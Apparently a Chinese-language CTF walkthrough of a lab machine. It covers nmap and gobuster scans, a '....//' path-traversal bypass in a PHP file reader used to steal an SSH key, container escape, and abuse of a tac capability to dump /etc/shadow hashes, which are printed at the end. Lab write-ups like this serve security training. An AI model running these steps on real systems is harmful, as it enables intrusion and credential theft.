nmap -sV -sC -Pn 10.129.1.191 > nmap.txt
gobuster dir -k -u http://10.129.1.191 -w /usr/share/dirb/wordlists/common.txt -x txt,php,py,cgi > gobuster.txt



1.nmap 掃描出80端口，打開發現是list manager
2.查看網頁內容發現有dirread.php  fileread.php  filewrite.php
3.查看fileread.php內容如下,將\n轉換行,\t轉tab,/轉空
{"file":"<?php\n\n\nif($_SERVER['REQUEST_METHOD'] === \"POST\"){\n\t$fileContent['file'] = false;\n\theader('Content-Type: application\/json');\n\tif(isset($_POST['file'])){\n\t\theader('Content-Type: application\/json');\n\t\t$_POST['file'] = str_replace( array(\"..\/\", \"..\\\"\"), \"\", $_POST['file']);\n\t\tif(strpos($_POST['file'], \"user.txt\") === false){\n\t\t\t$file = fopen(\"\/var\/www\/html\/\" . $_POST['file'], \"r\");\n\t\t\t$fileContent['file'] = fread($file,filesize($_POST['file']));  \n\t\t\tfclose();\n\t\t}\n\t}\n\techo json_encode($fileContent);\n}\n"}
4.發現代碼將../及..\轉換成空"",所以....//會轉換為../
5.可以查看路徑及檔案,查看到用戶nobody下面有.monitor得ssh key
6.使用ssh 可以登入victim
ssh -i id_rsa nobody@10.129.1.191
7.在容器裡面查看到ssh有monitor用戶登入過
ssh -i .monitor monitor@127.0.0.1 -t "bash --noprofile"
8.跳脫容器後,添加環境變量,使用正常指令
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
9.將LinEnumThor.sh下載過去執行,可以發現tac 指令可以以root身份執行
-e [+] Files with POSIX capabilities set:
/usr/bin/tac = cap_dac_read_search+ei
/home/monitor/app-dev/v0.1/logMonitor-0.1 = cap_dac_read_search+ei



app-dev:$6$RQ4VUGfn$6WYq54MO9AvNFMW.FCRekOBPYJXuI02AqR5lYlwN5/eylTlTWmHlLLvJ4FDp4Nt0A/AX2b3zdrvyEfwf8vSh3/:17654:0:99999:7:::
monitor:$6$IXQ7fATd$RsOewky58ltAbfdjYBHFk9/q5bRcUplLnM9ZHKknVB46smsKn4msCOXDpyYU6xw43rGqJl5fG3sMmEaKhJAJt/:17654:0:99999:7:::
steve:  $6$MmXo3me9$zPPUertAwnJYQM8GUya1rzCTKGr/AHtjSG2n3faSeupCCBjoaknUz2YUDStZtvUGWuXonFqXKZF8pXCkezJ.Q.:17653:0:99999:7:::
root:   $6$tRIbOmog$v7fPb8FKIT0QryKrm7RstojMs.ZXi4xxHz2Uix9lsw52eWtsURc9dwWMOyt4Gpd6QLtVtDnU1NO5KE5gF48r8.:17654:0:99999:7:::
